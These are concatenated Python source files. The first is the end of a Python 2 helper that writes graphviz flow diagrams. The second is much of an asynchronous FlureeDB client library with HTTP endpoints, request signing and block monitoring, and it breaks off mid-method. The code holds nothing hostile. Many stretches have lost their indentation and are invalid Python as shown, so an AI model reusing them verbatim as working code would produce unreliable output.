            if len(arr) == 5:
                org_node = arr[0]
                org_label = str(arr[1])
                next_node = arr[2]
                next_label = str(arr[3])
                link_label = str(arr[4])
                # must be <br/> in the dot file, I have a habit of using <br>
                org_label = flow_replace(org_label)
                next_label = flow_replace(next_label)
                link_label = flow_replace(link_label)
                # label are enclosed by < > instead of " " to handle html-ish markups
                if next_node:
                    link = "    %s -> %s;\n" % (org_node, next_node)
                    if link_label:
                        link = "    %s -> %s [label=<%s>];\n" % (org_node, next_node, link_label)
                    fhw.write(link)
                if org_label:
                    label = "    %s [label=<%s>];\n" % (org_node, org_label)
                    fhw.write(label)
                if next_label:
                    label = "    %s [label=<%s>];\n" % (next_node, next_label)
                    fhw.write(label)
    fh.close()
    fhw.write("}\n")
    fhw.close()
    if log:
        log.info("- created dot file: %s", dot_file)
    return dot_file
'''
simple replacements
'''
def flow_replace(my_str):
    """Expand the shorthand markup (<br>, <smf>, </f>) used in flow files
    into graphviz-safe HTML-like tags."""
    replacements = (
        ("<br>", "<br/>"),
        ("<smf>", "<font point-size=\"10\">"),
        ("</f>", "</font>"),
    )
    out = my_str
    for old, new in replacements:
        out = out.replace(old, new)
    return out
## ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
## main program
if __name__ == "__main__":
    # unit tests
    # Smoke tests exercising human_size / convert_cmd / dot_flow.
    # NOTE: Python 2 print-statement syntax; paths below are
    # NERSC-specific and will not exist elsewhere.
    print human_size(102192203)
    print human_size(250000000000)
    #print get_read_count_fastq("/global/projectb/scratch/brycef/sag/phix/11185.1.195330.UNKNOWN_matched.fastq.gz")
    cmd = "#bbtools;bbduk.sh in=/global/dna/dm_archive/sdm/illumina//01/14/88/11488.1.208132.UNKNOWN.fastq.gz ref=/global/dna/shared/rqc/ref_databases/qaqc/databases/phix174_ill.ref.fa outm=/global/projectb/scratch/brycef/phix/11488/11488.1.208132.UNKNOWN_matched.fastq.gz outu=/global/projectb/scratch/brycef/phix/11488/11488.1.208132.UNKNOWN_unmatched.fastq.gz"
    print convert_cmd(cmd)
    cmd = "#pigz;pigz /global/projectb/scratch/brycef/align/BTOYH/genome/11463.6.208000.CAAGGTC-AGACCTT.filter-RNA.fastq.gz-genome.sam"
    print convert_cmd(cmd)
    cmd = "#java;java -version"
    print convert_cmd(cmd)
    dot_flow("/global/projectb/scratch/brycef/pbmid/BWOAU/f2.flow", "/global/projectb/scratch/brycef/pbmid/BWOAU/BWOUAx.dot")
    sys.exit(0)
| 2.515625 | 3 |
aioflureedb/__init__.py | pibara/aioflureedb | 4 | 12765079 | #!/usr/bin/python3
# pylint: disable=too-few-public-methods
# pylint: disable=too-many-arguments
# pylint: disable=too-many-instance-attributes
# pylint: disable=simplifiable-if-statement
"""Basic asynchonous client library for FlureeDB"""
import sys
import asyncio
import json
import time
import aiohttp
from aioflureedb.signing import DbSigner
from aioflureedb.domain_api import FlureeDomainAPI
class FlureeException(Exception):
    """Base exception class for all aioflureedb errors."""
    def __init__(self, message):
        """Constructor

        Parameters
        ----------
        message : str
            Error message
        """
        super().__init__(message)
class FlureeHttpError(FlureeException):
    """Raised when the FlureeDB server answers with a non-200 HTTP status."""
    def __init__(self, message, status):
        """Initialize with the response body and HTTP status code.

        Parameters
        ----------
        message : str
            Error message (typically the HTTP response body)
        status : int
            HTTP status code returned by the server
        """
        # Keep the status around so callers can branch on it.
        self.status = status
        super().__init__(message)
class FlureeHalfCredentials(FlureeException):
    """Raised when only one half of a signing-key/auth-address pair is supplied."""
    def __init__(self, message):
        """Initialize with a human readable error message.

        Parameters
        ----------
        message : str
            Error message
        """
        super().__init__(message)
class FlureeKeyRequired(FlureeException):
    """Raised when an endpoint that requires signing is invoked without a signing key."""
    def __init__(self, message):
        """Initialize with a human readable error message.

        Parameters
        ----------
        message : str
            Error message
        """
        super().__init__(message)
class FlureeTransactionFailure(FlureeException):
    """Raised when a FlureeDB transaction does not complete successfully."""
    def __init__(self, message):
        """Initialize with a human readable error message.

        Parameters
        ----------
        message : str
            Error message
        """
        super().__init__(message)
class FlureeUnexpectedPredicateNumber(FlureeException):
    """Raised when a block contains a predicate id that is missing from the cached predicate map"""
    def __init__(self, message):
        """Constructor

        Parameters
        ----------
        message : str
            Error message
        """
        FlureeException.__init__(self, message)
_FLUREEQLQUERY_ENDPOINT_PERMISSIONS = {
'query': {
'permitted': {"select", "selectOne", "selectDistinct", "from", "where", "block", "prefixes", "vars", "opts"},
'depricated': {"filter", "union", "optional", "limit", "offset", "orderBy", "groupBy", "prettyPrint"}
},
'block': {
'permitted': {"block"},
'depricated': {'prettyPrint'}
},
'list_snapshots': {
'permitted': {},
'depricated': {}
},
'snapshot': {
'permitted': {},
'depricated': {}
}
}
class _FlureeQlSubQuery:
"""Helper class for FlureeQL multi-query syntactic sugar"""
def __init__(self, endpoint, method):
"""Constructor
Parameters
----------
endpoint : _FlureeQlEndpoint
API endpoint for communicating FlureeQL queries with FlureeDB
method : str
Name for the sub-query
"""
self.endpoint = endpoint
self.method = method
self.permittedkeys = _FLUREEQLQUERY_ENDPOINT_PERMISSIONS["query"]['permitted']
self.depricatedkeys = _FLUREEQLQUERY_ENDPOINT_PERMISSIONS["query"]['depricated']
def __call__(self, **kwargs):
"""FlureeQl query construction through keyword arguments
Parameters
----------
kwargs: dict
Keyword arguments for different parts of a FlureeQL query.
Raises
------
TypeError
If an unknown kwarg value is used.
"""
obj = {}
for key, value in kwargs.items():
if key == "ffrom":
key = "from"
if key == "ffilter":
key = "filter"
if key not in self.permittedkeys:
if key not in self.depricatedkeys:
raise TypeError("FlureeQuery got unexpected keyword argument '" + key + "'")
print("WARNING: Use of depricated FlureeQL syntax,",
key,
"should not be used as top level key in queries",
file=sys.stderr)
obj[key] = value
self.endpoint.multi_query[self.method] = obj
class _FlureeQlQuery:
"""Helper class for FlureeQL query syntactic sugar"""
def __init__(self, endpoint):
"""Constructor
Parameters
----------
endpoint : _FlureeQlEndpoint
API endpoint for communicating FlureeQL queries with FlureeDB
"""
self.endpoint = endpoint
self.permittedkeys = _FLUREEQLQUERY_ENDPOINT_PERMISSIONS[endpoint.api_endpoint]['permitted']
self.depricatedkeys = _FLUREEQLQUERY_ENDPOINT_PERMISSIONS[endpoint.api_endpoint]['depricated']
async def __call__(self, **kwargs):
"""FlureeQl query construction through keyword arguments
Parameters
----------
kwargs: dict
Keyword arguments for different parts of a FlureeQL query.
Raises
------
TypeError
If an unknown kwarg value is used.
Returns
-------
dict
json decode result from the server.
"""
obj = {}
for key, value in kwargs.items():
if key == "ffrom":
key = "from"
if key == "ffilter":
key = "filter"
if key not in self.permittedkeys:
if key not in self.depricatedkeys:
raise TypeError("FlureeQuery got unexpected keyword argument '" + key + "'")
print("WARNING: Use of depricated FlureeQL syntax,",
key,
"should not be used as top level key in queries",
file=sys.stderr)
obj[key] = value
return await self.endpoint.actual_query(obj)
async def raw(self, obj):
"""Use a readily constructed FlureeQL dictionary object to invoke the query API endpoint.
Parameters
----------
obj: dict
Complete FlureeQl query object.
Returns
-------
dict
json decode result from the server.
"""
return await self.endpoint.actual_query(obj)
class _UnsignedGetter:
    """Get info with a GET instead of a POST"""
    def __init__(self, session, url, ssl_verify_disabled=False, ready=None):
        """Constructor

        Parameters
        ----------
        session : aiohttp.ClientSession
            HTTP session for doing HTTP post/get with
        url : string
            URL of the API endpoint.
        ssl_verify_disabled: bool
            If https, don't verify ssl certs
        ready : string
            If defined, name of the response field that ready() polls until truthy.
        """
        self.session = session
        self.url = url
        self.ssl_verify_disabled = ssl_verify_disabled
        self.ready_field = ready

    async def __call__(self):
        """Invoke the functor: HTTP GET the endpoint and JSON-decode the response.

        Returns
        -------
        dict
            JSON decoded response from the server

        Raises
        ------
        FlureeHttpError
            If the server returns something different than a 200 OK status
        """
        # Both branches were identical except for ssl=False; collapse them by
        # only passing the ssl argument when verification is disabled.
        request_args = {"ssl": False} if self.ssl_verify_disabled else {}
        async with self.session.get(self.url, **request_args) as resp:
            if resp.status != 200:
                raise FlureeHttpError(await resp.text(), resp.status)
            response = await resp.text()
            return json.loads(response)

    async def ready(self):
        """Redo the GET until the configured ready condition becomes truthy.

        Connection errors and non-200 responses are treated as "not ready yet"
        and retried every half second.
        """
        if self.ready_field is None:
            print("WARNING: no ready for this endpoint", file=sys.stderr)
            return
        while True:
            try:
                obj = await self()
                if obj[self.ready_field]:
                    return
            except FlureeHttpError:
                pass
            except aiohttp.client_exceptions.ClientConnectorError:
                pass
            await asyncio.sleep(0.5)
class _SignedPoster:
"""Basic signed HTTP posting"""
def __init__(self, client, session, signer, url, required, optional, ssl_verify_disabled, unsigned=False):
"""Constructor
Parameters
----------
client : FlureeClient
FlureeClient used for checking for new databases
session : aiohttp.ClientSession
HTTP session for doing HTTP post/get with
signer : aioflureedb.signing.DbSigner
ECDSA signer for Fluree transactions and queries
url : string
URL of the API endpoint
required : set
Set of required fields for the specific API call.
optional : set
Set of optional fields for the specific API call.
ssl_verify_disabled: bool
If https, ignore ssl certificate issues.
unsigned : bool
If True, don't sign posts.
"""
self.client = client
self.session = session
self.signer = signer
self.url = url
self.required = required
self.optional = optional
self.unsigned = unsigned
if self.signer is None:
self.unsigned = True
self.ssl_verify_disabled = ssl_verify_disabled
async def _post_body_with_headers(self, body, headers):
"""Internal, post body with HTTP headers
Parameters
----------
body : string
HTTP Body string
headers : dict
Key value pairs to use in HTTP POST request
Returns
-------
string
Content as returned by HTTP server, dict if decodable json
Raises
------
FlureeHttpError
When Fluree server returns a status code other than 200
"""
if self.ssl_verify_disabled:
async with self.session.post(self.url, data=body, headers=headers, ssl=False) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
data = await resp.text()
try:
return json.loads(data)
except json.decoder.JSONDecodeError:
return data
else:
async with self.session.post(self.url, data=body, headers=headers) as resp:
if resp.status != 200:
raise FlureeHttpError(await resp.text(), resp.status)
data = await resp.text()
try:
return json.loads(data)
except json.decoder.JSONDecodeError:
return data
async def __call__(self, **kwargs):
"""Invoke post API
Parameters
----------
kwargs : dict
Keyword arguments for the POST API call.
Returns
-------
dict
JSON decoded response from FlureeDB server
Raises
------
TypeError
If an unknown kwarg is used on invocation OR a required kwarg is not supplied
"""
# pylint: disable=too-many-locals
kwset = set()
kwdict = {}
for key, value in kwargs.items():
if not (key in self.required or key in self.optional):
raise TypeError("SignedPoster got unexpected keyword argument '" + key + "'")
kwset.add(key)
if key == "db_id":
kwdict["db/id"] = value
else:
kwdict[key] = value
for reqkey in self.required:
if reqkey not in kwset:
raise TypeError("SignedPoster is missing one required named argument '", reqkey, "'")
body = json.dumps(kwdict, indent=4, sort_keys=True)
headers = {"Content-Type": "application/json"}
if not self.unsigned:
body, headers, _ = self.signer.sign_query(kwdict)
rval = await self._post_body_with_headers(body, headers)
# If this is a new-db, we need to await till it comes into existance.
if isinstance(rval, str) and len(rval) == 64 and self.url.split("/")[-1] == "new-db" and "db_id" in kwargs:
dbid = kwargs["db_id"]
while True:
databases = await self.client.dbs()
for database in databases:
dbid2 = database[0] + "/" + database[1]
if dbid == dbid2:
return True
await asyncio.sleep(0.1)
return rval
class _Network:
"""Helper class for square bracket interface to Fluree Client"""
def __init__(self, flureeclient, netname, options):
"""Constructor
Parameters
----------
flureeclient : FlureeClient
FlureeClient object to use as reference.
netname : string
Name of the network for net/db fluree database naming.
options : set
Set with existing databases within network.
"""
self.client = flureeclient
self.netname = netname
self.options = options
def __str__(self):
"""Cast to string
Returns
-------
str
Name of the network
"""
return self.netname
def __getitem__(self, key):
"""Square brackets operator
Parameters
----------
key : string
Name of the desired database
Returns
-------
_DbFunctor
Function for constructing a Fluree Database client.
Raises
------
KeyError
When a non defined database is requested.
"""
database = self.netname + "/" + key
if key not in self.options:
raise KeyError("No such database: '" + database + "'")
return _DbFunctor(self.client, database)
def __iter__(self):
"""Iterate over databases in network
Yields
------
string
Name of the database
_DbFunctor
Function object for getting a FlureeDB database object for this particular DB.
"""
for key in self.options:
database = self.netname + "/" + key
yield _DbFunctor(self.client, database)
class _DbFunctor:
"""Helper functor class for square bracket interface to Fluree Client"""
def __init__(self, client, database):
"""Constructor
Parameters
----------
client : FlureeClient
FlureeClient object to use as reference.
database : string
Full database name
"""
self.client = client
self.database = database
def __str__(self):
"""Cast to string
Returns
-------
str
Database name
"""
return self.database
def __call__(self, privkey=None, auth_address=None, sig_validity=120, sig_fuel=1000):
"""Invoke functor
Parameters
----------
privkey : string
Private key for the specific DB.
auth_address : string
Auth ID belonging with the privkey
sig_validity : int
Validity in seconda of signatures.
sig_fuel : int
Not sure what this is for, consult FlureeDB documentation for info.
Returns
-------
_FlureeDbClient
FlureeClient derived client for a specific DB
"""
return _FlureeDbClient(privkey,
auth_address,
self.database,
self.client.host,
self.client.port,
self.client.https,
self.client.ssl_verify,
sig_validity,
sig_fuel)
class FlureeClient:
    """Basic asynchonous client for FlureeDB for non-database specific APIs"""
    def __init__(self,
                 masterkey=None,
                 auth_address=None,
                 host="localhost",
                 port=8080,
                 https=False,
                 ssl_verify=True,
                 sig_validity=120,
                 sig_fuel=1000):
        """Constructor

        Parameters
        ----------
        masterkey : string
            Hex or base58 encoded signing key
        auth_address : string
            key-id of the signing key
        host : string
            hostname of the FlureeDB server. Defaults to localhost.
        port : int
            port of the FlureeDB server. Defaults to 8080
        https : bool
            Boolean indicating flureeDB is running behind a HTTPS proxy
        ssl_verify : bool
            Boolean, if False, indicating to not verify ssl certs.
        sig_validity : int
            Validity in seconds of request signatures.
        sig_fuel : int
            Fuel value embedded in signatures; consult FlureeDB documentation for info.

        Raises
        ------
        FlureeHalfCredentials
            If masterkey is specified but auth_address isn't, or the other way around.
        """
        self.host = host
        self.port = port
        self.https = https
        self.ssl_verify = ssl_verify
        # Certificate checks are only skipped when explicitly requested on https.
        self.ssl_verify_disabled = bool(https and not ssl_verify)
        self.signer = None
        if masterkey and auth_address:
            self.signer = DbSigner(masterkey, auth_address, None, sig_validity, sig_fuel)
        # Exactly one half of the credential pair supplied: refuse early.
        if bool(masterkey) != bool(auth_address):
            raise FlureeHalfCredentials("masterkey and auth_address should either both be specified, or neither")
        # Assign None first so close_session() stays safe even if session setup fails.
        self.session = None
        self.session = aiohttp.ClientSession()
        # All server endpoints this client can address through __getattr__.
        self.known_endpoints = {"dbs",
                                "new_db",
                                "delete_db",
                                "add_server",
                                "remove_server",
                                "health",
                                "new_keys"}
        # Endpoints that are invoked without a signature.
        self.unsigned_endpoints = {"dbs", "health", "new_keys"}
        # Endpoints invoked with HTTP GET instead of POST.
        self.use_get = {"health", "new_keys"}
        # Required keyword arguments per endpoint.
        self.required = {}
        self.required["new_db"] = {"db_id"}
        self.required["delete_db"] = {"db_id"}
        self.required["add_server"] = {"server"}
        # BUGFIX: this was keyed "delete_server", which is not a known endpoint,
        # so the "remove_server" endpoint had no required-argument check.
        self.required["remove_server"] = {"server"}
        # Optional keyword arguments per endpoint.
        self.optional = {"new_db": {"snapshot"}}
        # Endpoints with a working implementation in this library
        # (duplicate "new_keys" entry removed).
        self.implemented = {"dbs",
                            "new_keys",
                            "health",
                            "new_db",
                            "delete_db",
                            "add_server",
                            "remove_server"}

    async def __aenter__(self):
        """Method for allowing 'async with' constructs

        Returns
        -------
        FlureeClient
            this fluree client
        """
        return self

    async def __aexit__(self, exc_type, exc, traceback):
        """Async context manager exit: close the HTTP session."""
        await self.close_session()

    def __dir__(self):
        """Dir function for class

        Returns
        -------
        list
            List of defined (pseudo) attributes
        """
        # BUGFIX: "__aenter__"/"__aexit__" previously carried stray leading spaces.
        return list(self.known_endpoints) + ["close_session",
                                             "__init__",
                                             "__dir__",
                                             "__getattr__",
                                             "__getitem__",
                                             "__aiter__",
                                             "__aenter__",
                                             "__aexit__"]

    def __getattr__(self, api_endpoint):
        """Select API endpoint

        Parameters
        ----------
        api_endpoint : string
            Name of the API endpoint.

        Returns
        -------
        object
            Endpoint object suitable for API endpoint.

        Raises
        ------
        AttributeError
            When a non-defined fluree endpoint is designated
        NotImplementedError
            When a fluree API endpoint is designated that hasn't been implemented yet.
        """
        if api_endpoint not in self.known_endpoints:
            raise AttributeError("FlureeDB has no endpoint named " + api_endpoint)
        if api_endpoint not in self.implemented:
            raise NotImplementedError("No implementation yet for " + api_endpoint)
        secure = ""
        if self.https:
            secure = "s"
        # Python-style endpoint names map to dash-separated URL path components.
        url = "http" + \
              secure + \
              "://" + \
              self.host + \
              ":" + \
              str(self.port) + \
              "/fdb/" + \
              api_endpoint.replace("_", "-")
        signed = api_endpoint not in self.unsigned_endpoints
        use_get = api_endpoint in self.use_get
        required = self.required.get(api_endpoint, set())
        optional = self.optional.get(api_endpoint, set())
        if signed:
            return _SignedPoster(self, self.session, self.signer, url, required, optional, self.ssl_verify_disabled)
        if use_get:
            # The health endpoint exposes a "ready" flag that ready() can poll.
            if api_endpoint == "health":
                return _UnsignedGetter(self.session, url, self.ssl_verify_disabled, ready="ready")
            return _UnsignedGetter(self.session, url, self.ssl_verify_disabled)
        return _SignedPoster(self, self.session, self.signer, url, required, optional, self.ssl_verify_disabled, unsigned=True)

    async def __getitem__(self, key):
        """Square bracket operator

        Parameters
        ----------
        key : string
            Network name (or "network/db" pair), should be defined on server.

        Raises
        ------
        KeyError
            When a non-defined network is designated.

        Returns
        -------
        _Network
            Helper object for designating databases within a network
            (or the _DbFunctor directly when a "network/db" pair was given).
        """
        subkey = None
        if "/" in key:
            # Allow client["net/db"] as shorthand for client["net"]["db"].
            parts = key.split("/")
            key = parts[0]
            subkey = parts[1]
        databases = await self.dbs()
        options = set()
        for pair in databases:
            if pair[0] == key:
                options.add(pair[1])
        if not bool(options):
            raise KeyError("No such network: '" + key + "'")
        network = _Network(self, key, options)
        if subkey is None:
            return network
        return network[subkey]

    async def __aiter__(self):
        """Iterate over all networks

        Yields
        ------
        _Network
            Iterable object with databases per network.
        """
        databases = await self.dbs()
        optionsmap = {}
        for pair in databases:
            network = pair[0]
            database = pair[1]
            if network not in optionsmap:
                optionsmap[network] = set()
            optionsmap[network].add(database)
        for key, item in optionsmap.items():
            yield _Network(self, key, item)

    async def close_session(self):
        """Close HTTP(S) session to FlureeDB"""
        if self.session:
            await self.session.close()
        return
class _FlureeDbClient:
"""Basic asynchonous client for FlureeDB representing a particular database on FlureeDB"""
def __init__(self,
privkey,
auth_address,
database,
host="localhost",
port=8080,
https=False,
ssl_verify=True,
sig_validity=120,
sig_fuel=1000):
"""Constructor
Parameters
----------
privkey : string
Hex or base58 encoded signing key
auth_address : string
key-id of the signing key
database : string
net/db string of the flureeDB database
host : string
hostname of the FlureeDB server. Defaults to localhost.
port : int
port of the FlureeDB server. Defaults to 8080
https : bool
Boolean indicating flureeDB is running behind a HTTPS proxy
ssl_verify : bool
Boolean, when false, indicating no validation of ssl certs.
sig_validity : int
Validity in seconda of the signature.
sig_fuel : int
Not sure what this is for, consult FlureeDB documentation for info.
"""
self.database = database
self.host = host
self.port = port
self.https = https
self.ssl_verify_disabled = False
self.monitor = {}
self.monitor["listeners"] = {}
self.monitor["running"] = False
self.monitor["next"] = None
self.monitor["rewind"] = 0
self.monitor["on_block_processed"] = None
self.monitor["predicate_map"] = {}
self.monitor["predicate_map_multi"] = {}
self.monitor["predicate_map_block"] = 0
self.monitor["lastblock_instant"] = None
self.monitor["instant_monitors"] = []
if https and not ssl_verify:
self.ssl_verify_disabled = True
self.signer = None
if privkey and auth_address:
self.signer = DbSigner(privkey, auth_address, database, sig_validity, sig_fuel)
self.session = None
self.session = aiohttp.ClientSession()
self.known_endpoints = set(["snapshot",
"list_snapshots",
"export",
"query",
"flureeql",
"multi_query",
"block",
"history",
"transact",
"graphql",
"sparql",
"command",
"reindex",
"hide",
"gen_flakes",
"query_with",
"test_transact_with",
"block_range_with",
"ledger_stats",
"storage",
"pw"])
self.pw_endpoints = set(["generate", "renew", "login"])
self.implemented = set(["query",
"flureeql",
"block",
"command",
"ledger_stats",
"list_snapshots",
"snapshot",
"multi_query"])
    def monitor_init(self, on_block_processed, start_block=None, rewind=0, always_query_object=False, start_instant=None):
        """Set the basic variables for a fluree block event monitor run

        Parameters
        ----------
        on_block_processed: callable
            Callback to invoke when a block has been fully processed.
        start_block: int
            Block number to start at, instead of the next block to arive on the blockchain
        rewind: int
            Number of seconds to rewind from now; resolved into a concrete start
            block later by _figure_out_next_block (this method only stores it).
        always_query_object: bool
            Boolean choosing if we want to run efficiently and only query if block parsing gives ambiguous results,
            or if we always want to use extra queries
        start_instant: int
            If (and only if) instant monitor callbacks are used, this parameter should be provided to avoid
            large replays of inactive chain instant events that occured after the last block. Use the instant
            as provided py the persistence callback in the previous run.
        """
        # Fail fast on obviously wrong arguments; the monitor loop relies on these.
        assert callable(on_block_processed)
        assert start_block is None or isinstance(start_block, int)
        assert isinstance(rewind, int)
        self.monitor["next"] = start_block
        self.monitor["rewind"] = rewind
        self.monitor["always_query_object"] = always_query_object
        self.monitor["on_block_processed"] = on_block_processed
        self.monitor["lastblock_instant"] = start_instant
def monitor_register_create(self, collection, callback):
"""Add a callback for create events on a collection
Parameters
----------
collection: str
Name of the collection to monitor
callback: callable
Callback to invoke when create event on collection is identified.
"""
assert isinstance(collection, str)
assert callable(callback)
if collection not in self.monitor["listeners"]:
self.monitor["listeners"][collection] = {}
if "C" not in self.monitor["listeners"][collection]:
self.monitor["listeners"][collection]["C"] = set()
self.monitor["listeners"][collection]["C"].add(callback)
def monitor_register_delete(self, collection, callback):
"""Add a callback for delete events on a collection
Parameters
----------
collection: str
Name of the collection to monitor
callback: callable
Callback to invoke when delete event on collection is identified.
"""
assert isinstance(collection, str)
assert callable(callback)
if collection not in self.monitor["listeners"]:
self.monitor["listeners"][collection] = {}
if "D" not in self.monitor["listeners"][collection]:
self.monitor["listeners"][collection]["D"] = set()
self.monitor["listeners"][collection]["D"].add(callback)
def monitor_register_update(self, collection, callback):
"""Add a callback for update events on a collection
Parameters
----------
collection: str
Name of the collection to monitor
callback: callable
Callback to invoke when update event on collection is identified.
"""
assert isinstance(collection, str)
assert callable(callback)
if collection not in self.monitor["listeners"]:
self.monitor["listeners"][collection] = {}
if "U" not in self.monitor["listeners"][collection]:
self.monitor["listeners"][collection]["U"] = set()
self.monitor["listeners"][collection]["U"].add(callback)
def monitor_instant(self, predicate, callback, offset=0):
"""Ass a callback for the passing of time on an instant predicate
Parameters
----------
predicate: str
Name of the instant predicate to monitor
callback: callable
Callback to invoke when the time (plus offset) passes the monitored instant
offset: int
If specified, number of seconds from monitored instant value to trigger on
"""
self.monitor["instant_monitors"].append([predicate, offset*1000, callback])
def monitor_close(self):
"""Abort running any running monitor"""
self.monitor["running"] = False
    async def _figure_out_next_block(self):
        """Resolve a requested rewind window into a concrete next block number.

        When monitor_init configured a non-zero rewind, query FlureeDB for the
        oldest block whose instant falls inside the rewind window and move
        self.monitor["next"] forward to it when it is newer than (or there is no)
        configured start block. Mutates self.monitor["next"]; returns nothing.
        """
        if self.monitor["rewind"] != 0 and self.monitor["rewind"] is not None:
            # Fluree filter: instants newer than now minus rewind seconds
            # (rewind is in seconds, instants presumably in milliseconds).
            # NOTE(review): the closing parentheses appear unbalanced (one extra
            # ')'); verify this filter string against the FlureeDB query docs.
            filt = "(> ?instant (- (now) (* 1000 " + str(self.monitor["rewind"]) + "))))"
            rewind_block = await self.flureeql.query(
                select=["?blockid"],
                opts={"orderBy": ["ASC", "?instant"], "limit": 1},
                where=[
                    ["?block", "_block/instant", "?instant"],
                    ["?block", "_block/number", "?blockid"],
                    {"filter": [filt]}
                ])
            if rewind_block and (self.monitor["next"] is None or self.monitor["next"] < rewind_block[0][0]):
                self.monitor["next"] = rewind_block[0][0]
            if not rewind_block:
                # No block inside the window: fall back to "start at next block".
                self.monitor["next"] = None
    async def _build_predicates_map(self, block=None):
        """(Re)build the cached predicate-id -> name and name -> multi lookup maps.

        Parameters
        ----------
        block : int, optional
            When given, build the maps as of this block, and remember the block
            number so a repeated call for the same block becomes a no-op.

        Results are stored in self.monitor["predicate_map"] and
        self.monitor["predicate_map_multi"]; nothing is returned.
        """
        if block is not None:
            if self.monitor["predicate_map_block"] != block:
                predicates = await self.flureeql.query(select=["name", "multi"], ffrom="_predicate", block=block)
                self.monitor["predicate_map_block"] = block
            else:
                # Maps already built for this block; skip the query.
                predicates = None
        else:
            predicates = await self.flureeql.query(select=["name", "multi"], ffrom="_predicate")
        if predicates is not None:
            predicate = {}
            is_multi = {}
            for pred in predicates:
                # NOTE(review): relies on "_id" being present in query results
                # even though only name/multi are selected -- confirm against
                # the FlureeDB query behavior.
                predicate[pred["_id"]] = pred["name"]
                if "multi" in pred:
                    is_multi[pred["name"]] = pred["multi"]
                else:
                    is_multi[pred["name"]] = False
            self.monitor["predicate_map"] = predicate
            self.monitor["predicate_map_multi"] = is_multi
    async def _find_start_block(self):
        """Find the start block for a monitor run.

        Returns
        -------
        int
            Number of the starting block: the configured monitor["next"] when
            set, otherwise the newest block reported by ledger_stats.

        Raises
        ------
        RuntimeError
            Raised when the very first ledger_stats issued to FlureeDB returns an error.
        """
        if self.monitor["next"] is None:
            # No explicit start block configured: begin at the ledger's newest block.
            stats = await self.ledger_stats()
            if "status" in stats and stats["status"] == 200 and "data" in stats and "block" in stats["data"]:
                startblock = stats["data"]["block"]
            else:
                raise RuntimeError("Invalid initial response from ledger_stats")
        else:
            startblock = self.monitor["next"]
        return startblock
    async def _get_endblock(self, errorcount=0):
        """Get what for now should be the ending block

        Parameters
        ----------
        errorcount: int
            Counter for counting succesive API failure

        Returns
        -------
        int
            The ending block number (0 when ledger_stats did not answer sanely)
        int
            An updated version of the errorcount argument (reset to 0 on success)
        """
        stats = await self.ledger_stats()
        if "status" in stats and stats["status"] == 200 and "data" in stats and "block" in stats["data"]:
            endblock = stats["data"]["block"]
            # Successful answer resets the consecutive-error counter.
            return endblock, 0
        # Malformed or failed response: no end block, bump the error counter.
        return 0, errorcount + 1
def _get_flakeset_collection(self, flakelist):
"""Helper function for getting the collection name from a flakes array
Parameters
----------
flakelist : list
list of flake lists
Returns
-------
str
Name of the collection.
"""
return flakelist[0][1].split("/")[0]
    async def _group_block_flakes(self, block_data, blockno):
        """Return a grouped-by object-id and predicate-name patched version of a block

        Parameters
        ----------
        block_data : list
            Raw block data as returned by FlureeDB
        blockno : int
            Number of the block currently being processed.

        Returns
        -------
        dict
            A dictionary of object id's to flake arrays.

        Raises
        ------
        FlureeUnexpectedPredicateNumber
            Raised when an unknown predicate id is detected.
        """
        has_predicate_updates = False
        grouped = {}
        for flake in block_data[0]["flakes"]:
            predno = flake[1]
            # Patch numeric predicates to textual ones (mutates the flake in place).
            if predno in self.monitor["predicate_map"]:
                flake[1] = self.monitor["predicate_map"][predno]
            else:
                raise FlureeUnexpectedPredicateNumber("Need a restart after new predicates are added to the database")
            # Group the flakes together by object (subject id is flake[0]).
            if not flake[0] in grouped:
                grouped[flake[0]] = []
            grouped[flake[0]].append(flake)
        # pylint: disable=consider-using-dict-items
        for obj in grouped:
            # A flakeset touching _predicate means the schema changed in this block.
            if grouped[obj][0][1].split("/")[0] == "_predicate":
                has_predicate_updates = True
        # pylint: enable=consider-using-dict-items
        if has_predicate_updates:
            # Refresh the cached predicate map so later blocks see new predicates.
            await self._build_predicates_map(blockno)
        return grouped
def _get_transactions_and_temp_ids(self, flakeset):
"""Extract transactions and temp id's from a single 'tx' flakeset
Parameters
----------
flakeset : list
List of flakes belonging to a 'tx' in the current block.
Returns
-------
list
list of operations from this transaction
dict
map of temporary ids.
"""
operations = None
tempids = None
for flake in flakeset:
if flake[1] == '_tx/tempids':
try:
tid_obj = json.loads(flake[2])
if isinstance(tid_obj, dict):
tempids = tid_obj
except json.decoder.JSONDecodeError:
pass
elif flake[1] == "_tx/tx":
try:
tx_obj = json.loads(flake[2])
if isinstance(tx_obj, dict) and "tx" in tx_obj and isinstance(tx_obj["tx"], list):
operations = tx_obj["tx"]
except json.decoder.JSONDecodeError:
pass
return operations, tempids
def _get_block_instant(self, flakeset):
"""Extract transactions and temp id's from a single 'tx' flakeset
Parameters
----------
flakeset : list
List of flakes belonging to a 'tx' in the current block.
Returns
-------
int
Time instance value for this block
"""
instance = None
for flake in flakeset:
if flake[1] == '_block/instant':
instance = flake[2]
return instance
    async def _get_block_instant_by_blockno(self, block):
        """Get the instant timestamp for a given block number

        Parameters
        ----------
        block: int
            Block number

        Returns
        -------
        int
            Time instant value for this block, or None when the block was not found.
        """
        result = await self.flureeql.query(
            select=["?instant"],
            where=[
                ["?block", "_block/instant", "?instant"],
                ["?block", "_block/number", block]
            ]
        )
        if result:
            # Result rows are lists; first row, first column holds the instant.
            return result[0][0]
        return None
    def _get_object_id_to_operation_map(self, tempids, operations):
        """Process temp ids and operations, return an object id to operation map.

        Parameters
        ----------
        tempids : dict
            Temp-id map (temp id string -> real integer object id)
        operations : list
            List of operation dicts from the transaction's "tx" list.

        Returns
        -------
        dict
            object id to operation map. The empty-string key "" maps to the sole
            operation of a single-operation transaction (fallback match).
        """
        # pylint: disable=too-many-nested-blocks, too-many-branches
        obj_tx = {}
        if tempids:
            for tmp_id in tempids:
                real_id = tempids[tmp_id]
                # Occurrence counters for duplicate string _ids (Fluree suffixes
                # repeats as "name$1", "name$2", ...).
                counters = {}
                if isinstance(real_id, int):
                    for operation in operations:
                        if isinstance(operation, dict) and "_id" in operation:
                            if isinstance(operation["_id"], str):
                                # Direct match of the temp id string.
                                if operation["_id"] == tmp_id:
                                    obj_tx[real_id] = operation
                                if operation["_id"] not in counters:
                                    counters[operation["_id"]] = 0
